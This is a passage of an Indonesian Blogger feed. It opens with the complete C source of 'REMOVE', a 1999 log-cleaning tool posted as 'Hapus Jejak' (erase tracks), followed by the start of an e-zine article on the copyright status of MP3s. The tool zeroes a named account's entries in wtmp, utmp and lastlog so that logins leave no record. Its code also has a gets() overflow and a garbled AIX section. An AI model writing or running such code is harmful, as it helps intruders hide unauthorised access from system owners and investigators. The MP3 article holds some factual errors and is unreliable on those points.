/&gt;machine.&lt;br /&gt;*/&lt;br /&gt;&lt;br /&gt;#include &lt;stdio.h&gt;&lt;br /&gt;#include &lt;utmp.h&gt;&lt;br /&gt;#include &lt;sys&gt;&lt;br /&gt;#include &lt;unistd.h&gt;&lt;br /&gt;#include &lt;fcntl.h&gt;&lt;br /&gt;#ifndef AIX&lt;br /&gt;#include &lt;lastlog.h&gt;&lt;br /&gt;#else&lt;br /&gt;#include &lt;login.h&gt;&lt;br /&gt;#endif&lt;br /&gt;#include &lt;pwd.h&gt;&lt;br /&gt;&lt;br /&gt;#ifdef AIX&lt;br /&gt;#define WTMP "/var/log/wtmp"&lt;br /&gt;#define UTMP "/etc/utmp"&lt;br /&gt;#define LASTLOG "/etc/security/lastlog" /* Not a binary file in AIX, so */&lt;br /&gt;/* handled a bit differently.   */&lt;br /&gt;char LogParam[7][30]=&lt;br /&gt;{&lt;br /&gt;"time_last_login=","tty_last_login=","host_last_login=",&lt;br /&gt;"unsuccessful_login_count=","time_last_unsuccessful_login=",&lt;br /&gt;"tty_last_unsuccessful_login=","host_last_unsuccessful_login="&lt;br /&gt;};&lt;br /&gt;#endif&lt;br /&gt;#ifdef SCO&lt;br /&gt;#define WTMP "/etc/wtmp"   /* wtmp was here on the SCO box I accessed */&lt;br /&gt;#define UTMP "/var/run/utmp"&lt;br /&gt;#define LASTLOG "/var/log/lastlog"&lt;br /&gt;#endif&lt;br /&gt;#ifdef GENERIC  /* Should work with Linux, IRIX, Digital Unix, BSDs, etc */&lt;br /&gt;#define WTMP "/var/log/wtmp"&lt;br /&gt;#define UTMP "/var/run/utmp"&lt;br /&gt;#define LASTLOG "/var/log/lastlog"&lt;br /&gt;#endif&lt;br /&gt;&lt;br /&gt;void main(argc,argv)&lt;br /&gt;int  argc;&lt;br /&gt;char *argv[];&lt;br /&gt;{&lt;br /&gt;int cleanWtmp(char *,int);&lt;br /&gt;int cleanUtmp(char *,int);&lt;br /&gt;int cleanLastlog(char *);&lt;br /&gt;int getCount(char *,char *);&lt;br /&gt;char line[10];&lt;br /&gt;int killem, firstcnt, t;&lt;br /&gt;&lt;br /&gt;if(argc!=2)&lt;br /&gt;{&lt;br /&gt;printf("Usage: %s acct\n",argv[0]);&lt;br /&gt;exit(0);&lt;br /&gt;}&lt;br /&gt;firstcnt=getCount(WTMP,argv[1]); /* Get an initial count */&lt;br /&gt;printf("\nREMOVE by Simple Nomad\nNomad Mobile Research Centre (c) 1999\n\n")&lt;br /&gt;;&lt;br /&gt;printf("Found %d record(s) for user %s\n",firstcnt,argv[1]);&lt;br /&gt;printf("Will attempt a lastlog cleanup by default.\n\n");&lt;br /&gt;printf("#    - remove last # records from utmp/wtmp\n");&lt;br /&gt;printf("a    - remove (a)ll records from utmp/wtmp\n");&lt;br /&gt;printf("q    - (q)uit program\n\n");&lt;br /&gt;printf("Enter selection -&gt; ");&lt;br /&gt;gets(line);&lt;br /&gt;if(line[0]==0x51 || line[0]==0x71) exit(0);&lt;br /&gt;if(line[0]==0x41 || line[0]==0x61) killem=firstcnt;&lt;br /&gt;else killem=atoi(line);&lt;br /&gt;if (killem&gt;firstcnt)&lt;br /&gt;{&lt;br /&gt;printf("You cannot delete %d records if only %d exist.\n",killem,firstcnt);&lt;br /&gt;exit(-1);&lt;br /&gt;}&lt;br /&gt;t=cleanWtmp(argv[1],killem); /* Now to clean up utmp and wtmp */&lt;br /&gt;if (t==1) {&lt;br /&gt;printf("Trouble cleaning up %s.\n",WTMP);&lt;br /&gt;exit(-1);&lt;br /&gt;} else printf("REMOVE cleaned up %d record(s) from %s\n",killem,WTMP);&lt;br /&gt;t=cleanUtmp(argv[1],killem);&lt;br /&gt;if (t==1) {&lt;br /&gt;printf("Trouble cleaning up %s.\n",UTMP);&lt;br /&gt;exit(-1);&lt;br /&gt;} else printf("REMOVE cleaned up %d record(s) from %s\n",killem,UTMP);&lt;br /&gt;t=cleanLastlog(argv[1]);    /* Make our attempt at lastlog */&lt;br /&gt;if (t==1) {&lt;br /&gt;printf("Trouble cleaning up %s.\n",LASTLOG); exit(-1);&lt;br /&gt;}&lt;br /&gt;printf("REMOVE cleaned up %s\n",LASTLOG);&lt;br /&gt;} /* end main */&lt;br /&gt;&lt;br /&gt;int getCount(fname,acct) /* Go check wtmp and find out how many records */&lt;br /&gt;char *fname, *acct;&lt;br /&gt;{&lt;br /&gt;struct utmp utmp_ent;&lt;br /&gt;int f,cnt=0;&lt;br /&gt;&lt;br /&gt;if((f=open(fname,O_RDWR))&gt;=0){&lt;br /&gt;while(read(f,&amp;utmp_ent,sizeof(utmp_ent)))if(!strncmp(utmp_ent.ut_name, acct&lt;br /&gt;,strlen(acct)))cnt++;&lt;br /&gt;}&lt;br /&gt;close(f);&lt;br /&gt;return(cnt);&lt;br /&gt;} /* end getCount */&lt;br /&gt;&lt;br /&gt;int cleanWtmp(acct,killem)&lt;br /&gt;char *acct;&lt;br /&gt;int killem;&lt;br /&gt;{&lt;br /&gt;struct utmp utmp_ent;&lt;br /&gt;int fd,count=0;&lt;br /&gt;if((fd=open(WTMP,O_RDWR))&gt;=0){&lt;br /&gt;while(read(fd,&amp;utmp_ent,sizeof(utmp_ent)))if(!strncmp(utmp_ent.ut_name,acct&lt;br /&gt;,strlen(acct)))count++;&lt;br /&gt;lseek(fd,0,SEEK_SET);&lt;br /&gt;while(read(fd,&amp;utmp_ent,sizeof(utmp_ent))&amp;amp;&amp;killem){&lt;br /&gt;  if(!strncmp(utmp_ent.ut_name,acct,strlen(acct))){&lt;br /&gt;    count--;&lt;br /&gt;    if(count+1&lt;=killem){          bzero((char *)&amp;utmp_ent,sizeof(utmp_ent));          lseek(fd,-(sizeof(utmp_ent)),SEEK_CUR);          write(fd,&amp;utmp_ent,sizeof(utmp_ent));          killem--;        }      }    }    close(fd);  }  else return(1); } /* end cleanWtmp */  int cleanUtmp(acct,killem) char *acct; int killem; {  struct utmp utmp_ent;  int fd;  if((fd=open(UTMP,O_RDWR))&gt;=0){&lt;br /&gt;lseek(fd,0,SEEK_SET);&lt;br /&gt;while(read(fd,&amp;utmp_ent,sizeof(utmp_ent))&amp;amp;&amp;killem){&lt;br /&gt;  if(!strncmp(utmp_ent.ut_name,acct,strlen(acct))){&lt;br /&gt;    if(killem&gt;0){&lt;br /&gt;      bzero((char *)&amp;amp;utmp_ent,sizeof(utmp_ent));&lt;br /&gt;      lseek(fd,-(sizeof(utmp_ent)),SEEK_CUR);&lt;br /&gt;      write(fd,&amp;utmp_ent,sizeof(utmp_ent));&lt;br /&gt;      killem--;&lt;br /&gt;    }&lt;br /&gt;  }&lt;br /&gt;}&lt;br /&gt;close(fd);&lt;br /&gt;}&lt;br /&gt;else return(1);&lt;br /&gt;} /* end cleanUtmp */&lt;br /&gt;&lt;br /&gt;int cleanLastlog(acct) /* The lastlog subroutine */&lt;br /&gt;char *acct;&lt;br /&gt;{&lt;br /&gt;#ifdef AIX /* Quite a kludge for AIX, but what the fuck it works */&lt;br /&gt;int t,i;&lt;br /&gt;char entry[200];&lt;br /&gt;for (i=0;i&lt;7;i++)&gt;/dev/null",LASTLOG,acct,LogParam[i])&lt;br /&gt;;&lt;br /&gt;t=system(entry);&lt;br /&gt;printf("Return code for %s is %d\n",LogParam[i],t);&lt;br /&gt;}&lt;br /&gt;#else  /* Normal binary lastlog cleanup */&lt;br /&gt;struct passwd *pwd;&lt;br /&gt;struct lastlog logit;&lt;br /&gt;int f;&lt;br /&gt;if((pwd=getpwnam(acct))){&lt;br /&gt;if((f=open(LASTLOG,O_RDWR))&gt;=0){&lt;br /&gt;  lseek(f,(long)pwd-&gt;pw_uid*sizeof(struct lastlog),0);&lt;br /&gt;  bzero((char *)&amp;logit,sizeof(logit));&lt;br /&gt;  write(f,(char *)&amp;logit,sizeof(logit));&lt;br /&gt;  close(f);&lt;br /&gt;}&lt;br /&gt;}&lt;br /&gt;else return(1);&lt;br /&gt;#endif&lt;br /&gt;} /* end cleanLastlog */&lt;br /&gt;&lt;/pwd.h&gt;&lt;/login.h&gt;&lt;/lastlog.h&gt;&lt;/fcntl.h&gt;&lt;/unistd.h&gt;&lt;/sys&gt;&lt;/utmp.h&gt;&lt;/stdio.h&gt;&lt;/span&gt;&lt;/pre&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/2588755122724100110-1651508468719500692?l=siswaplus.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://siswaplus.blogspot.com/feeds/1651508468719500692/comments/default' title='Poskan Komentar'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=2588755122724100110&amp;postID=1651508468719500692' title='0 Komentar'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/2588755122724100110/posts/default/1651508468719500692'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/2588755122724100110/posts/default/1651508468719500692'/><link rel='alternate' type='text/html' href='http://siswaplus.blogspot.com/2007/06/hapus-jejak.html' title='Hapus Jejak .C'/><author><name>SISWA+ Team</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-2588755122724100110.post-4771326021494623848</id><published>2007-06-19T13:32:00.000+07:00</published><updated>2007-07-05T12:43:42.532+07:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='MP3'/><title type='text'>Analisis Permasalahan Hukum Terhadap Mp3</title><content type='html'>&lt;pre style="font-family: verdana;"&gt;&lt;span style="font-size:78%;"&gt;Kecoak Elektronik Indonesia [ KEI ]&lt;br /&gt;http://www.kecoak-elektronik.net&lt;br /&gt;&lt;br /&gt;####################################################################&lt;br /&gt;TOKET - Terbitan Online Kecoak Elektronik&lt;br /&gt;Defending the classical hackers mind since 1995&lt;br /&gt;&lt;br /&gt;Publisher : http://www.kecoak-elektronik.net&lt;br /&gt;Contact   : staff@kecoak-elektronik.net&lt;br /&gt;####################################################################&lt;br /&gt;&lt;br /&gt;Subject   : Analisis Permasalahan Hukum Terhadap Mp3&lt;br /&gt;Writer    : Ahmad Zakaria of Kecoak Elektronik&lt;br /&gt;Contact   : zka@kecoak-elektronik.net&lt;br /&gt;Style     : Unicode Transformation Format (UTF-8)&lt;br /&gt;&lt;br /&gt;--[1]-- Kecoak Elektronik License&lt;br /&gt;&lt;br /&gt;Kecoak Elektronik secara aktif mendukung Blue Ribbon Campaign.&lt;br /&gt;Kami akan berusaha untuk menerbitkan semua informasi yang kami anggap&lt;br /&gt;patut diketahui, baik dokumen teks, artikel majalah, atau surat kabar.&lt;br /&gt;Seluruh kredit akan diberikan kepada sang pengarang.&lt;br /&gt;&lt;br /&gt;Kecoak Elektronik tidak bertanggung jawab atas tindakan orang lain.&lt;br /&gt;Informasi yang disajikan di situs ini adalah untuk tujuan pendidikan&lt;br /&gt;dan informasionil belaka. Jika anda memutuskan untuk mengejawantahkan&lt;br /&gt;dalam bentuk apapun informasi yang tersimpan di situs ini, anda&lt;br /&gt;melakukan atas keputusan sendiri, dan tidak seorangpun selain anda&lt;br /&gt;bertanggung jawab atas tindakan tersebut.&lt;br /&gt;&lt;br /&gt;Dipersilahkan untuk mengambil sebagian atau seluruh dari isi artikel&lt;br /&gt;yang kami terbitkan dengan tetap mencantumkan kredit atas pengarang&lt;br /&gt;dan Kecoak Elektronik sebagai penerbit online. Artikel yang dikutip&lt;br /&gt;atau diambil tidak dapat dipergunakan untuk kepentingan komersil.&lt;br /&gt;&lt;br /&gt;--[2]-- Pendahuluan&lt;br /&gt;&lt;br /&gt;MP3 adalah sebuah singkatan dari Motion Picture Expert Group, Layer 3&lt;br /&gt;yang merupakan format encoding suatu data audio yang bertujuan untuk&lt;br /&gt;mereduksi dan melakukan kompresi sejumlah data dalam audio tersebut,&lt;br /&gt;namun tetap memiliki kualitas audio sama dengan yang tidak mengalami&lt;br /&gt;kompresi.  Sebagai contoh, suatu data audio yang disimpan dalam format&lt;br /&gt;lain membutuhkan space sebesar 50 megabyte, sedangkan apabila mengguna&lt;br /&gt;kan format MP3, space yang dibutuhkan hanya seperlimanya saja, yaitu&lt;br /&gt;sekitar 5 megabyte.&lt;br /&gt;&lt;br /&gt;Faktor ukuran data dari MP3 yang hanya membutuhkan space yang sedikit&lt;br /&gt;dari sebuah hardisk dan semakin maraknya diseminasi atau pertukaran&lt;br /&gt;data di internet yang dipacu semakin tingginya kecepatan transfer data&lt;br /&gt;di Internet, telah menyebabkan terjadi penyebaran data MP3 yang begitu&lt;br /&gt;pesat. Penyebaran yang begitu pesat ini menimbulkan suatu isu penting&lt;br /&gt;seputar MP3, yaitu aspek legalitas dari MP3 khususnya terkait dengan&lt;br /&gt;hak cipta.&lt;br /&gt;&lt;br /&gt;Sebagian besar konten MP3 adalah sebuah musik atau lagu. Lagu tersebut&lt;br /&gt;biasanya berasal dari Compat Disk (CD) yang orisinil kemudian setelah&lt;br /&gt;melalui proses grabbing, lagu tersebut di kompresi menggunakan encoding&lt;br /&gt;software MP3 sehingga menjadi data MP3 yang biasanya berekstensi data&lt;br /&gt;.mp3.  Rata-rata sebuah CD memuat sebelas hingga dua belas lagu dengan&lt;br /&gt;total data sebesar 650 MB. Setelah melalui proses konversi menjadi MP3,&lt;br /&gt;besar data masing-masing lagu berkisar antara lima hingga enam megabyte.&lt;br /&gt;Setelah mencapai besaran yang terkompresi, data-data tersebut dengan&lt;br /&gt;mudah dapat didistribusikan melalui internet. Data tersebut dapat di&lt;br /&gt;distribusikan melalui surat elektronik (e-mail), melalui proses upload&lt;br /&gt;ke server tertentu kemudian di-download, atau dapat juga melalui&lt;br /&gt;pertukaran data orang perorang yang biasa disebut dengan peer-to-peer&lt;br /&gt;networking.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;--[3]-- Form dan Substance MP3&lt;br /&gt;&lt;br /&gt;Pemahaman terhadap MP3 terlebih dahulu dimulai dari pemahaman mengenai&lt;br /&gt;form atau bentuk dan substance atau isi dari MP3. Dilihat dari bentuknya,&lt;br /&gt;MP3 adalah sebuah software atau perangkat lunak. MP3 dapat dikategorikan&lt;br /&gt;secara bentuk sebagai software karena memiliki karakteristik sebuah&lt;br /&gt;software, yaitu dibangun berdasarkan algoritma tertentu, menggunakan&lt;br /&gt;suatu bahasa program (MP3 pertama kali ditulis menggunakan bahasa C),&lt;br /&gt;dan telah melalui proses coding dan decoding sehingga dapat dikenali&lt;br /&gt;oleh suatu operation system.  Dengan pemahaman MP3 sebagai software,&lt;br /&gt;Thomson Consumer Electronics sebagai pemegang lisensi dari MPEG Layer&lt;br /&gt;1, 2, dan 3, mematenkan software MP3 di negara yang mengakui adanya “software&lt;br /&gt;patent” seperti United Stated of America dan Jepang.sSesungguhnyaMP3&lt;br /&gt;dikatakan sebagai sebuah software karena MP3 menjalankan suatu fungsi&lt;br /&gt;komputasi tertentu, yaitu melakukan konversi dan kompresi data audio dengan&lt;br /&gt;encoding MP3 hingga dapat didengarkan menggunakan MP3 player seperti WinAmp&lt;br /&gt;untuk platform windows da XMMS untuk platform *nix. Dengan dipatenkanya&lt;br /&gt;MP3, tidak banyak pengembang software yang mau mengembangkan software&lt;br /&gt;berbasis MP3, sehingga lahir beberapa software alternatif seperti Ogg,&lt;br /&gt;dan WMA. Dengan demikian, MP3 secara form menjadi illegal di negara-negara&lt;br /&gt;yang mengakui paten terhadap software, hingga berakhirnya waktu paten&lt;br /&gt;pada 2010 dan paten menjadi public domain.&lt;br /&gt;&lt;br /&gt;Dilain sisi, apabila memahami MP3 dari sudut pandang substansinya maka&lt;br /&gt;pemahaman ini beranjak dari konten atau isi dari MP3 itu sendiri.&lt;br /&gt;Seperti yang telah dijelaskan sebelumnya, konten atau isi dari MP3&lt;br /&gt;adalah data audio yang umumnya merupakan musik atau lagu. Dengan&lt;br /&gt;pemikiran ini, maka secara substantif MP3 adalah sebuah karya cipta&lt;br /&gt;yang merupakan bagian dari Hak Cipta. Pemahaman terhadap bentuk dan&lt;br /&gt;isi MP3 amat penting untuk menentukan aspek legalitas dari MP3 tersebut,&lt;br /&gt;sehingga dapat diketahui kapan suatu MP3 merupakan data legal dan kapan&lt;br /&gt;suatu MP3 dikatakan sebagai data illegal.&lt;br /&gt;&lt;br /&gt;--[4]-- Aspek Legalitas MP3&lt;br /&gt;&lt;br /&gt;Asosiasi Industri Rekaman Amerika (The Recording Industry Association&lt;br /&gt;of America/RIAA) tengah menghadapi permasalahan dengan sebuah mesin&lt;br /&gt;pencari (search engine) di Internet. Pada Maret 1998, Federasi&lt;br /&gt;Internasional Industri Phonograph (the International Federation of the&lt;br /&gt;Phonograph Industry/IFPI), sebuah asosiasi rekaman lain, mengajukan&lt;br /&gt;gugatan terkait dengan perkara kriminal terhadap FAST Search and Transfer&lt;br /&gt;ASA, sebuah search engine untuk pencarian MP3 yang berlokasi di Oslo.&lt;br /&gt;Search engine ini memberikan sebuah links langsung ke file MP3 untuk&lt;br /&gt;dapat diunduh secara langsung. FAST memberikan lisensi search engine&lt;br /&gt;tersebut kepada Lycos, salah satu search engine terbesar yang berlokasi&lt;br /&gt;di Amerika Serikat. Dilain kesempatan RIAA juga telah mengajukan&lt;br /&gt;gugatan terhadap Lycos di Amerika Serikat. Laporan yang telah diajukan&lt;br /&gt;IFPI hanya menyangkut tuduhan-tuduhan terhadap FAST yang merupakan&lt;br /&gt;masalah pelanggaran hak cipta. Namun, selama tujuh bulan setelah laporan&lt;br /&gt;tersebut diberikan, tidak terdapat gugatan atau laporan kriminal yang&lt;br /&gt;diajukan.&lt;br /&gt;&lt;br /&gt;Alasan yang paling dimungkinkan dengan tidak adanya tuntutan terhadap&lt;br /&gt;Lycos atau FAST adalah terdapat sebuah klausula perjanjian yang menyatakan&lt;br /&gt;search engine ini tidak memasukkan MP3 illegal kedalam database-nya.&lt;br /&gt;Pada Maret 1999, ketika terjadi ancaman penuntutan, Lycos tidak&lt;br /&gt;melakukan tindakan apapun terhadap perjanjian tersebut. Di sisi lain,&lt;br /&gt;Altavista’s Photo &amp; Media Finder, sebuah search engine yang dapat mencari&lt;br /&gt;halaman-halaman khusus mengenai tipe-tipe multimedia termasuk MP3, telah&lt;br /&gt;mengambil suatu tindakan untuk menghentikan hukum di atas. Pertama,&lt;br /&gt;AltaVista memiliki kebijakan terhadap pelanggaran hak cipta yang tertulis&lt;br /&gt;dalam website-nya; pada prinsipnya, perusahaan tersebut memberitahukan&lt;br /&gt;kepada pengguna bahwa apa yang mereka unduh telah dilindungi hak cipta,&lt;br /&gt;dan pengguna harus mendapatkan izin sebelum menggunakan apa yang mereka&lt;br /&gt;unduh. Kedua, search engine memiliki tombol yang dapat digunakan&lt;br /&gt;pengunduh untuk melaporkan apabila ada data yang terlarang, hal tersebut&lt;br /&gt;memberikan hasil di site-nya bahwa data yang melakukan pelanggaran hak&lt;br /&gt;cipta telah diblokir dari AltaVista. Ketiga, para pembuat website akan&lt;br /&gt;menjaga website-nya agar tidak terlacak spider (sebuah software untuk&lt;br /&gt;merekam jejakan data yang kemudian diberikan kepada database search&lt;br /&gt;engine). Berdasarkan laporan tersebut, AltaVista akan menyaring data-&lt;br /&gt;data yang illegal untuk meminimalisir tuntutan dari RIAA dan asosiasi&lt;br /&gt;industri lainnya. Pada awalnya, Lycos tidak melakukan tindakan-tindakan&lt;br /&gt;tersebut di atas, tetapi sejak dikeluarkannya kebijakan dan penyangkalan&lt;br /&gt;dan ketika telah ditemukan cara untuk menemukan MP3 yang illegal, Lycos&lt;br /&gt;melakukan tindakan di atas. Seperti semula, AltaVista tidak diancam dan&lt;br /&gt;Lycos serta FAST telah menanggapi tuntutan yang diajukan terhadapnya,&lt;br /&gt;tindakan ini mungkin sudah cukup untuk meredakan tuntutan. Dengan&lt;br /&gt;menekan penyedia search engine, RIAA terlihat paling berusaha untuk&lt;br /&gt;mencegah peredaran MP3 illegal dalam komunitas “bawatanah” internet dimana&lt;br /&gt;data-data tidak mudah untuk diakses oleh pengguna biasa. Jika AltaVista&lt;br /&gt;dan Lycos mengikuti janji mereka, tujuan RIAA akan tercapai dengan&lt;br /&gt;efektif. Sepanjang MP3 yang illegal yang dapat ditemukan di search&lt;br /&gt;engine dapat dihilangkan dengan cepat, search engine akan mampu&lt;br /&gt;untuk mencegah penuntutan terhadap pelanggaran hak cipta.&lt;br /&gt;&lt;br /&gt;Yang menarik, hukum Amerika Serikat dapat membenarkan penuntutan&lt;br /&gt;terhadap hak cipta tersebut. Undang-undang Hak Cipta tahun 1976 tetap&lt;br /&gt;mengenakan tanggung jawab kriminal, walaupun tanpa pelanggaran langsung;&lt;br /&gt;bagi pihak yang mendukung pelanggaran tersebut dimungkinkan bertanggung&lt;br /&gt;jawab lebih berat. Berdasarkan undang-undang tersebut, pihak yang&lt;br /&gt;“diketahui dan diduga membantu atau besekongkol dalam pelanggaran hak&lt;br /&gt;cipta dapat dikenakan hukuman pidana seperti yang berlaku bagi pelaku&lt;br /&gt;utama”. Sebagai tambahan, undang-undang menetapkanbahwa sangat penting&lt;br /&gt;terdakwa menghubungkan dirinya dalam beberapa cara usaha melakukan&lt;br /&gt;tindakan kriminal dimana terdakwa tersebut ikut serta agar tujuan&lt;br /&gt;tindakan kriminal tersebut dapat timbul, dan terdakwa tersebut mencari&lt;br /&gt;cara-cara untuk membuatnya berhasil.” Laporan kriminal pada akhirnya&lt;br /&gt;dapat diajukan terhadap search engine, hal tersebut akan sulit dalam&lt;br /&gt;penuntutan yaitu pembuktian bukti yang penting. Dengan perkembangan&lt;br /&gt;format MP3 yang sangat populer, tidak dapat dihindari kenyataan bahwa&lt;br /&gt;search engine dapat menjadi hal yang bodoh dimana dalam kenyataannya&lt;br /&gt;data-data MP3 adalah ilegal dan data-data yang ilegal tersebut tersedia&lt;br /&gt;di search engine database. Di sisi lain, kelihatannya sebagian besar&lt;br /&gt;search engine akan dapat menyebabkan keberhasilan tindakan kriminal.&lt;br /&gt;Meskipun demikian, sebuah search engine tetap memiliki kesulitan dalam&lt;br /&gt;mendeteksi apakah MP3 tersebut ilegal atau legal. Search engine tersebut&lt;br /&gt;memfasilitasi salinan dan distribusi tersebut untuk menghasilkan uang&lt;br /&gt;melalui peningkatan iklan dalam suatu situs. Sayangnya, gugatan yang&lt;br /&gt;dapat menangani pelanggaran terhadap search engine dapat membawa&lt;br /&gt;kesulitan yang sama seperti terhadap Rio: salah satu contoh search&lt;br /&gt;engine, termasuk MP3, dimungkinkan memiliki mekanisme penggunaan tanpa&lt;br /&gt;pelanggaran, contohnya distribusi yang mensahkan keberadaan MP3.&lt;br /&gt;Beberapa pelanggaran lain akan dibutuhkan karena search engine mungkin&lt;br /&gt;tidak melakukan suatu hal yang akan menjadi pelanggaran langsung,&lt;br /&gt;seperti yang merujuk ke website lainnya. Beberapa kasus yang muncul di&lt;br /&gt;Swedia memperlihatkan kecenderungan tersebut. Tommy Olsson, mahasiswa&lt;br /&gt;swedia bersikap bahwa “dia mendukung pencurian musik dengan jaringan&lt;br /&gt;yang terhubung dengan arsip MP3 illegal dari websitenya”. Olsson diklaim&lt;br /&gt;bersalah oleh IFPI, organisasi yang sama dengan FAST yang digugat di&lt;br /&gt;Norwegia. Pengadilan mungkin menemukan kesalahan pada Osslon dan&lt;br /&gt;menetapkan ia bersalah atas pelanggaran hukum hak cipta, tetapi sejak&lt;br /&gt;tuntutan tidak diajukan, pengadilan tidak dapat memutuskan bahwa ia&lt;br /&gt;bersalah terhadap klaim tersebut. Namun, walaupun Olsson tidak secara&lt;br /&gt;langsung melakukan pencurian musik, dia tetap harus bertanggung jawab.&lt;br /&gt;Search engine pada dasarnya menunjukan fungsi yang sama seperti&lt;br /&gt;Olsson—menyediakan jaringan. Terhadap Olsson, berdasarkan hukum&lt;br /&gt;Amerika Serikat, tidak bertanggung jawab secara langsung tetapi dapat&lt;br /&gt;dikenakan tanggung jawab terhadap pelanggaran hak cipta.&lt;br /&gt;&lt;br /&gt;Dengan mengajukan gugatan pelanggaran hak cipta, RIAA akan mampu untuk&lt;br /&gt;melindungi sebagian besar search engine gratis dari MP3 yang ilegal.&lt;br /&gt;Bagaimanapun juga, hal tersebut sepertinya menunjukan bahwa RIAA&lt;br /&gt;mungkin tidak akan mampu untuk menangkap beberapa search engine yang&lt;br /&gt;lebih kecil, yang lebih khusus yang sama dengan website RIAA. Alasan&lt;br /&gt;utama dari hal ini adalah kemampuan search engine untuk sering mengubah&lt;br /&gt;alamat web untuk menghindari deteksi/pencarian. Hal terbaik yang dapat&lt;br /&gt;dilakukan RIAA untuk memerangi pencurian ini adalah bersaing dengan&lt;br /&gt;search engine. Banyak yang memercayai, popularitas MP3 dapat menyebabkan&lt;br /&gt;reaksi yang kurang menarik terhadap RIAA dalam perubahan teknologi dan&lt;br /&gt;permintaan konsumen.&lt;br /&gt;&lt;br /&gt;Jika RIAA memiliki cara untuk menawarkan produknya dengan harga yang&lt;br /&gt;pantas, tingkat popularitas dari MP3 ilegal akan menurun drastis.&lt;br /&gt;Walaupun murah adalah lebih mahal daripada gratis, pencurian akan&lt;br /&gt;selalu terlihat dalam beberapa bentuk, sebagian besar konsumen&lt;br /&gt;walaupun mereka ikut melakukan pencurian, tetap ingin melakukan hal&lt;br /&gt;yang legal. Namun, saat ini tidak banyak yang berkompetisi secara&lt;br /&gt;legal. Jika konsumen menginginkan MP3 yang masuk dalam “Top 10 hit”&lt;br /&gt;, atau musik-musik yang berasal dari band terkenal, konsumen akan&lt;br /&gt;mendapatkannya dengan membeli CD musik tersebut atau mengunduh dari&lt;br /&gt;MP3 ilegal karena tidak ada pilihan lain yang legal. MP3 yang legal&lt;br /&gt;masih terbatas pada band yang tidak terkenal dengan beberapa&lt;br /&gt;pengecualian. Dengan memberikan kemudahan untuk mencari legal copy&lt;br /&gt;dengan harga yang wajar, sebagian besar konsumen mungkin akan memilih&lt;br /&gt;untuk membeli barang yang legal. Kemajuan terjadi dalam munculnya ide&lt;br /&gt;ini. RIAA datang dengan mengembangkan ide-ide untuk memasuki “electronik&lt;br /&gt;download market”. Namun industri tersebut diharapkan menjadi industri&lt;br /&gt;yang memiliki pengamanan lebih baik terhadap objek hak cipta. Industri&lt;br /&gt;tersebut berusaha untuk bekerja dengan alternatif perlindungan hak&lt;br /&gt;cipta MP3 yang disebut Secure Digital Music Initiative (SDMI).&lt;br /&gt;Teorinya, SDMI akan memiliki kualitas suara yang lebih baik daripada&lt;br /&gt;MP3 tetapi hanya dapat memberikan sedikit salinan untuk dibuat dalam&lt;br /&gt;hasil yang telah diberikan hak cipta (copyrighted work). Namun&lt;br /&gt;beberapa tahap dalam pengembangan, banyak insiders percaya bahwa&lt;br /&gt;format SDMI akan lebih lambat dan tidak efisien, sulit untuk digunakan,&lt;br /&gt;dan lebih mahal dari MP3. Jika kasusnya seperti itu, konsumen tidak&lt;br /&gt;akan menyukainya, dan beberapa memprediksikan bahwa SDMI akan gagal.&lt;br /&gt;Jika alternatif yang diberikan RIAA adalah untuk mencapai keberhasilan,&lt;br /&gt;maka apa yang dihasilkan haruslah sama dengan apa yang dapat diberikan&lt;br /&gt;MP3. Hal tersebut muncul bahwa RIAA masih berada dalam beberapa tahun&lt;br /&gt;dari tercapainya tujuan tersebut, sehingga pada saatnya nanti, RIAA&lt;br /&gt;akan berusaha untuk mengikuti cara sebelumnya yang telah dilakukan&lt;br /&gt;untuk menghambat MP3.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;--[5]-- Perlindungan Hukum Terhadap MP3 di Indonesia&lt;br /&gt;&lt;br /&gt;Maraknya peredaran MP3 illegal di Indonesia telah mencapai taraf&lt;br /&gt;yang menghawatirkan terhadap perkembangan investasi dibidang cakram&lt;br /&gt;optik. Menurut Wakil Ketua Umum  Gabungan Pengusara Rekaman Indonesia,&lt;br /&gt;Binsar Victor Silalahi, mengaku mengakhawatirkan maraknya VCD/DVD/&lt;br /&gt;CD/MP3 lagu dan film bajakan. Berdasar catatan dia, dalam sebulan&lt;br /&gt;sekurang pembajak mampu memproduksi delapan juta keping VCD/DVD/&lt;br /&gt;CD/MP3 bajakan, “Ini akan berpengaruh terhadap investasi cakram optik.&lt;br /&gt;Apalagi DVD/VCD porno dapat mengakibatkan kasus-kasus asusila di&lt;br /&gt;masyarakat. Ini harus ditekan,'' jelasnya.&lt;br /&gt;&lt;br /&gt;Awal perkembangannya, kualitas suara musik atau lagu yang asli&lt;br /&gt;berbeda dengan kualitas lagu atau masik yang hasil bajakan. Namun&lt;br /&gt;dengan adanya teknologi konversi digital seperti adanya MP3,&lt;br /&gt;penurunan kualitas suara pada produk bajakan bisa diminimalisir,&lt;br /&gt;bahkan kualitas suara produk bajakan setara dengan kualitas suara pada&lt;br /&gt;CD orisinal.  Selain itu harga sebuah keping MP3 illegal (bajakan) jauh&lt;br /&gt;lebih murah dari harga keping CD orisinal. Sebagai perbandingan, harga&lt;br /&gt;suatu keping MP3 illegal yang mampu memuat lebih dari seratus lagu&lt;br /&gt;berkisar lima ribu rupiah hingga sepuluh ribu rupiah, dibandingkan&lt;br /&gt;dengan MP3 bajakan yang beredar dengan harga lima ribu rupiah perkeping.&lt;br /&gt;Kedua faktor ini lah yang menyebabkan pembajakan MP3 di Indonesia&lt;br /&gt;semakin marak. Untuk menekan laju pembajakan dan atau peredaran MP3&lt;br /&gt;bajakan di Indonesia perlu adanya law enforcement yang kuat dan tegas&lt;br /&gt;oleh aparat penegak hukum, Salah satunya melalui perlindungan terhadap&lt;br /&gt;Hak Kekayaan Intelektual. Perlindungan terhadap MP3 dalam sudut pandang&lt;br /&gt;hukum mengenai hak kekayaan intelektual khususnya hak 